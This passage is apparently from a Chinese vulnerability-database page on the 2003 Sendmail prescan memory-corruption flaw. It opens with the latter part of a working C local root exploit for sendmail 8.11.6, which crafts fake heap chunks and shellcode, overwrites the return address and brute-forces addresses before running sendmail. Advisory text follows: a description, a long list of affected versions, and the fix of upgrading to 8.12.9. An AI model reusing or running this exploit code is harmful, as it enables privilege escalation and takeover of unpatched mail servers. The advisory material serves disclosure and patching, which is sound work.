	        		"\xa1\xff\xff\xbf"	/* yes unlink will overwrite 0xbfffffa1+12 ... but who cares */
	        		"\xa1\xff\xff\xbf";
	        		
                memcpy(ptr,chunk,strlen(chunk));
	        ptr += strlen(chunk);
	                                                       
	        if(ptr + strlen(chunk) >= stackfiller+target.stack_len-1)
	                break;
	}
	memcpy(stackfiller,shellcode,strlen(shellcode));
	arg[2] = stackfiller;		                                                                                                        



	/* prepare egg */
	memset(egg,'A',1200);
	egg[1200] = 0;
	
        for(i=0; i < target.distance - 1200; i++) 
	        strcat(egg,"\xff\\");
	                                	
        /* set delimptr */
        ptr2 = (int*) &egg[target.ebp+target.delimptr-target.pvpbuf];
        *ptr2 = target.zero;

        /* set al  */
        ptr2 = (int*) &egg[target.ebp+target.al-target.pvpbuf];
	*ptr2 = target.zero-11*4;
	
        /* set e  */
        ptr2 = (int*) &egg[target.ebp+target.e-target.pvpbuf];
	*ptr2 = target.zero;
	
	
        /* set bufp */
        ptr2 = (int*) &egg[target.ebp+target.bufp-target.pvpbuf];
	*ptr2 = target.chunk;
	
	/* set ret ebp + 4 */
	ptr2 = (int*) &egg[target.ebp+4-target.pvpbuf];
	*ptr2 = target.ret;
	
	
		        
		

	/* execute program */
	pid = fork();
	if(pid == -1) {
		perror("fork()");
		exit(-1);
	}
	
	/* child */
	if(pid==0) {
		execve(target.sendmail,arg,NULL);
		perror("execve()");
		kill(getpid(),SIGKILL);
		exit(0);
	}
	else {
		int status;
		wait(&status);
		
		if(WIFEXITED(status) == 0)
			return 0;
		return 1;
	}
}


/* 
 * OK here is how we brute force.
 * We need to find two values... a valid chunk to free (our fake chunk)
 * and the pvpbuf addr
 * Since our fake chunk is repeated all over and is 4*5 bytes long,
 * we have 5 possibilites of error in a sequencial search. We try for:
 * chunk,chunk+4,chunk+8,chunk+12,chunk+16
 *
 * pvpbuf addr must be somewhere lower than ebp, specifically ebp + target.bufp (or else
 * the exploit will fail since we cannot overwrite bufp. We start from bruteforcing ebp + target.bufp
 * decreasing by 4 bytes
 *
 */
void bruteforce(struct target_info target) {
	int cincrease = 0;	/* how many times we increased chunk value */
	target.pvpbuf = target.ebp+target.bufp;

	printf("Trying pvpbuf=0x%x\n",target.pvpbuf);

	while(target.ebp - target.pvpbuf < 2000) {	/* exploit will fail since pvpbuf < 2000 bytes */
		if(exploit(target)) {
			printf("Successfull exploitation with pvpbuf=0x%x and chunk=0x%x\n",target.pvpbuf,target.chunk);
			return;
		}
		
		/* make sure it is a "usable" address ... start with a base of 0x0a since u have space untill 0xfe */		
		target.chunk+=4;
		cincrease++;
		if(cincrease > 4) {
			target.chunk -= cincrease*4;	/* start at initial value again */
			cincrease =0;
			target.pvpbuf -= 4;
			printf("Trying pvpbuf=0x%x\n",target.pvpbuf);
		}
	}
	
	printf("Bruteforce failed\n");
}

void print_targets() {
	int tcount = sizeof(targets)/sizeof(struct target_info);
	int i;
	
	printf("Id\tDescription\tpvpbuf\t\tzero\t\tchunk\t\tshellcode addr\n");
	
	for(i = 0; i < tcount; i++) {
		printf("%d)\t%s\t0x%x\t0x%x\t0x%x\t0x%x\n",i,
			targets[i].description,targets[i].pvpbuf,targets[i].zero,targets[i].chunk,targets[i].ret);
	}
	
}

void usage(char *p) {
	printf("Usage: %s <opts>\n",p);
	printf("-h\tthis lame message\n");
	printf("-t\ttarget\n");
	printf("-b\tbrute force\n");
	printf("\n");
	print_targets();
	exit(0);
}

int main(int argc, char *argv[]) {
	int t = 0;
	int brute = 1;
	int opt;

	printf("Local sendmail 8.11.6 exploit by sorbo (sorbox@yahoo.com)\n");

	while( (opt = getopt(argc,argv,"t:bh")) != -1) {
		switch(opt) {
			case 't':
				t = atoi(optarg);
				if(t >= sizeof(targets)/sizeof(struct target_info)) {
					printf("Invalid target %d\n",t);
					exit(0);
				}
				brute = 0;
				break;
				
			case 'b':
				brute = 1;
				break;
				

			case 'h':
			default:
				usage(argv[0]);
		}
	}
	
	printf("Attempting to exploit %s\n",targets[t].description);
	if(brute) {
		bruteforce(targets[t]);
		exit(0);
	}

	printf("pvpbuf=\t\t0x%x\n",targets[t].pvpbuf);
	printf("zero=\t\t0x%x\n",targets[t].zero);
	printf("chunk=\t\t0x%x\n",targets[t].chunk);
	printf("shellcode=\t0x%x\n",targets[t].ret);

	t = exploit(targets[t]);
	if(t)
		printf("Exploit successfull\n");
	else
		printf("Exploit failed... try adding -b\n");

	exit(0);
}
		

- 漏洞信息

8294
Sendmail NOCHAR Control Value prescan Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in Sendmail. Due to a vulnerable char to int conversion it is possible to use the NOCHAR control value to bypass the length check done by the prescan function resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.

- 时间线

2003-03-29 2003-03-18
2003-03-29 Unknow

- 解决方案

Upgrade to version 8.12.9 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Sendmail Address Prescan Memory Corruption Vulnerability
Boundary Condition Error 7230
Yes Yes
2003-03-29 12:00:00 2007-09-21 11:40:00
Discovery credited to Michal Zalewski.

- 受影响的程序版本

Sun Solaris 2.5.1 _x86
Sun Solaris 2.5.1 _ppc
Sun Solaris 2.5.1
Sun Solaris 9_x86 Update 2
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun Solaris 2.5_x86
Sun Solaris 2.5
Sun Solaris 2.4_x86
Sun Solaris 2.4
Sun LX50
Sun Linux 5.0
+ Sun LX50
Sun Cobalt RaQ4 3001R
Sun Cobalt RaQ XTR 3500R
Sun Cobalt RaQ 550 4100R
Sun Cobalt Qube3 4000WG
SGI IRIX 6.5.19
SGI IRIX 6.5.18
SGI IRIX 6.5.17
SGI IRIX 6.5.16
SGI IRIX 6.5.15
SGI IRIX 6.5.14
SGI IRIX 6.5.13
SGI IRIX 6.5.12
SGI IRIX 6.5.11
SGI IRIX 6.5.10
SGI IRIX 6.5.9
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.1
SGI IRIX 6.5
Sendmail Inc Sendmail Switch 3.0.3
Sendmail Inc Sendmail Switch 3.0.2
Sendmail Inc Sendmail Switch 3.0.1
Sendmail Inc Sendmail Switch 3.0
Sendmail Inc Sendmail Switch 2.2.5
Sendmail Inc Sendmail Switch 2.2.4
Sendmail Inc Sendmail Switch 2.2.3
Sendmail Inc Sendmail Switch 2.2.2
Sendmail Inc Sendmail Switch 2.2.1
Sendmail Inc Sendmail Switch 2.2
Sendmail Inc Sendmail Switch 2.1.5
Sendmail Inc Sendmail Switch 2.1.4
Sendmail Inc Sendmail Switch 2.1.3
Sendmail Inc Sendmail Switch 2.1.2
Sendmail Inc Sendmail Switch 2.1.1
Sendmail Inc Sendmail Switch 2.1
Sendmail Inc Sendmail for NT 3.0.3
Sendmail Inc Sendmail for NT 3.0.2
Sendmail Inc Sendmail for NT 3.0.1
Sendmail Inc Sendmail for NT 3.0
Sendmail Inc Sendmail for NT 2.6.2
Sendmail Inc Sendmail for NT 2.6.1
Sendmail Inc Sendmail for NT 2.6
Sendmail Consortium Sendmail 8.12.8
+ RedHat Linux 9.0 i386
+ RedHat Linux 8.0 i386
+ Yellow Dog Linux 3.0
Sendmail Consortium Sendmail 8.12.7
+ OpenPKG OpenPKG 1.2
+ Slackware Linux 8.1
+ SOTLinux SOTLinux 2003 Desktop
+ SOTLinux SOTLinux 2003 Server
Sendmail Consortium Sendmail 8.12.6
Sendmail Consortium Sendmail 8.12.5
Sendmail Consortium Sendmail 8.12.4
Sendmail Consortium Sendmail 8.12.3
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ FreeBSD FreeBSD 4.6
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
Sendmail Consortium Sendmail 8.12.2
Sendmail Consortium Sendmail 8.12.1
+ HP MPE/iX 7.5
+ HP MPE/iX 7.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
Sendmail Consortium Sendmail 8.12 beta7
Sendmail Consortium Sendmail 8.12 beta5
Sendmail Consortium Sendmail 8.12 beta16
Sendmail Consortium Sendmail 8.12 beta12
Sendmail Consortium Sendmail 8.12 beta10
Sendmail Consortium Sendmail 8.12 .0
Sendmail Consortium Sendmail 8.11.6
Sendmail Consortium Sendmail 8.11.5
Sendmail Consortium Sendmail 8.11.4
+ Conectiva Linux 7.0
- Slackware Linux 8.0
Sendmail Consortium Sendmail 8.11.3
Sendmail Consortium Sendmail 8.11.2
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
Sendmail Consortium Sendmail 8.11.1
Sendmail Consortium Sendmail 8.11
+ Compaq Tru64 5.1 b
+ Compaq Tru64 5.1 a
+ Compaq Tru64 5.1
+ IBM AIX 5.2
+ IBM AIX 5.1
- Mandriva Linux Mandrake 7.2
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0
+ SCO Open Server 5.0.6 a
+ SCO Open Server 5.0.6
+ SCO Open Server 5.0.5
+ SCO Open Server 5.0.4
Sendmail Consortium Sendmail 8.10.2
Sendmail Consortium Sendmail 8.10.1
Sendmail Consortium Sendmail 8.10
Sendmail Consortium Sendmail 8.9.3
+ Compaq Tru64 5.1 PK5 (BL19)
+ Compaq Tru64 5.0 a PK3 (BL17)
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ IBM AIX 4.3.3
+ SGI IRIX 6.5.19
+ SGI IRIX 6.5.18 m
+ SGI IRIX 6.5.18 f
+ SGI IRIX 6.5.17 m
+ SGI IRIX 6.5.17 f
+ SGI IRIX 6.5.16 m
+ SGI IRIX 6.5.16 f
+ SGI IRIX 6.5.15 m
+ SGI IRIX 6.5.15 f
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.11 m
+ SGI IRIX 6.5.11 f
+ SGI IRIX 6.5.10 m
+ SGI IRIX 6.5.10 f
+ SGI IRIX 6.5.9 m
+ SGI IRIX 6.5.9 f
+ SGI IRIX 6.5.8 m
+ SGI IRIX 6.5.8 f
+ SGI IRIX 6.5.7 m
+ SGI IRIX 6.5.7 f
Sendmail Consortium Sendmail 8.9.2
Sendmail Consortium Sendmail 8.9.1
Sendmail Consortium Sendmail 8.9 .0
SCO OpenLinux Workstation 3.1.1
SCO OpenLinux Server 3.1.1
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 2.1
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Enterprise Linux AS 2.1
NetBSD NetBSD 1.6
NetBSD NetBSD 1.5.3
NetBSD NetBSD 1.5.2
NetBSD NetBSD 1.5.1
NetBSD NetBSD 1.5
IBM z/OS V1R4
IBM z/OS V1R2
IBM z/OS
IBM OS/390 V2R9
IBM OS/390 V2R8
IBM OS/390 V2R6
IBM OS/390 V2R10
IBM MVS
IBM AIX 5.1 L
IBM AIX 4.3.3
IBM AIX 4.3.2
IBM AIX 4.3.1
IBM AIX 4.3
IBM AIX 5.2
IBM AIX 5.1
HP Tru64 5.1 a PK4 (BL21)
HP NonStop-UX Whitney
HP NonStop-UX PUMA
HP MPE/iX 7.5
HP MPE/iX 7.0
HP MPE/iX 6.5
HP MPE/iX 6.0
HP Internet Express 6.0
HP Internet Express 5.9
HP Internet Express 5.8
HP Internet Express 5.7
HP Internet Express 5.4
HP HP-UX (VVOS) 11.0.4
HP HP-UX (VVOS) 11.0 4
HP HP-UX (VVOS) 10.24
HP HP-UX 11.22
HP HP-UX 11.20
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
HP HP-UX 10.34
HP HP-UX 10.30
HP HP-UX 10.26
HP HP-UX 10.24
HP HP-UX 10.20 SIS
HP HP-UX 10.20 Series 800
HP HP-UX 10.20 Series 700
HP HP-UX 10.20
HP HP-UX 10.16
HP HP-UX 10.10
HP HP-UX 10.9
HP HP-UX 10.8
HP HP-UX 10.1 0
HP HP-UX 10.0 1
HP HP-UX 10.0
HP HP-UX B.11.22
HP HP-UX B.11.11
HP HP-UX B.11.04
HP HP-UX B.11.00
HP AltaVista Firewall Raptor EC
HP AltaVista Firewall AVFW98
HP AlphaServer SC
Compaq Tru64 5.1 b PK1 (BL1)
Compaq Tru64 5.1 b
Compaq Tru64 5.1 a PK3 (BL3)
Compaq Tru64 5.1 a PK2 (BL2)
Compaq Tru64 5.1 a PK1 (BL1)
Compaq Tru64 5.1 a
Compaq Tru64 5.1 PK6 (BL20)
Compaq Tru64 5.1 PK5 (BL19)
Compaq Tru64 5.1 PK4 (BL18)
Compaq Tru64 5.1 PK3 (BL17)
Compaq Tru64 5.1
Compaq Tru64 5.0 f
Compaq Tru64 5.0 a PK3 (BL17)
Compaq Tru64 5.0 a
Compaq Tru64 5.0 PK4 (BL18)
Compaq Tru64 5.0 PK4 (BL17)
Compaq Tru64 5.0
Compaq Tru64 4.0 g PK3 (BL17)
Compaq Tru64 4.0 g
Compaq Tru64 4.0 f PK7 (BL18)
Compaq Tru64 4.0 f PK6 (BL17)
Compaq Tru64 4.0 f
Compaq Tru64 4.0 d PK9 (BL17)
Compaq Tru64 4.0 d
Compaq Tru64 4.0 b
Apple Mac OS X Server 10.2.4
Apple Mac OS X Server 10.2.3
Apple Mac OS X Server 10.2.2
Apple Mac OS X Server 10.2.1
Apple Mac OS X Server 10.2
Apple Mac OS X 10.2.4
Apple Mac OS X 10.2.3
Apple Mac OS X 10.2.2
Apple Mac OS X 10.2.1
Apple Mac OS X 10.2
SGI IRIX 6.5.20
Apple Mac OS X Server 10.2.5
Apple Mac OS X 10.2.5

- 不受影响的程序版本

SGI IRIX 6.5.20
Apple Mac OS X Server 10.2.5
Apple Mac OS X 10.2.5

- 漏洞讨论

A vulnerability in Sendmail may be exploited remotely to execute arbitrary code. The flaw is present in the 'prescan()' procedure, which is used for processing email addresses in SMTP headers. This condition has been confirmed to be exploitable by remote attackers to execute instructions on target systems. This vulnerability stems from a logic error in the conversion of a char to an integer value. The issue has been fixed Sendmail 8.12.9.

- 漏洞利用

The following local exploit for sendmail 8.11.6 was provided by sorbo (sorbox@yahoo.com).

A new exploit has been released by 127 Research and is available from the following location:

http://www.7f.no-ip.com/

- 解决方案

Please see the referenced advisories for more information.


Sun Solaris 8_sparc

IBM z/OS V1R4
  • IBM PQ72696


Sun Solaris 7.0

HP HP-UX B.11.11

HP HP-UX B.11.00

Apple Mac OS X Server 10.2

Apple Mac OS X 10.2

Apple Mac OS X 10.2.1

Apple Mac OS X Server 10.2.2

Apple Mac OS X 10.2.3

Apple Mac OS X Server 10.2.3

Apple Mac OS X 10.2.4

HP HP-UX 10.20

HP HP-UX 11.0 4

HP HP-UX 11.22

Compaq Tru64 4.0 f PK7 (BL18)

Compaq Tru64 5.1 PK6 (BL20)

SGI IRIX 6.5.16

SGI IRIX 6.5.18

SGI IRIX 6.5.19

HP MPE/iX 7.5

Sendmail Consortium Sendmail 8.10

Sendmail Consortium Sendmail 8.10.1

Sendmail Consortium Sendmail 8.11

Sendmail Consortium Sendmail 8.11.2

Sendmail Consortium Sendmail 8.11.4

Sendmail Consortium Sendmail 8.11.5

Sendmail Consortium Sendmail 8.12 beta12

Sendmail Consortium Sendmail 8.12 beta5

Sendmail Consortium Sendmail 8.12.1

Sendmail Consortium Sendmail 8.12.3

Sendmail Consortium Sendmail 8.12.7

Sendmail Consortium Sendmail 8.12.8

Sendmail Consortium Sendmail 8.9 .0

Sendmail Consortium Sendmail 8.9.2

Sendmail Consortium Sendmail 8.9.3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站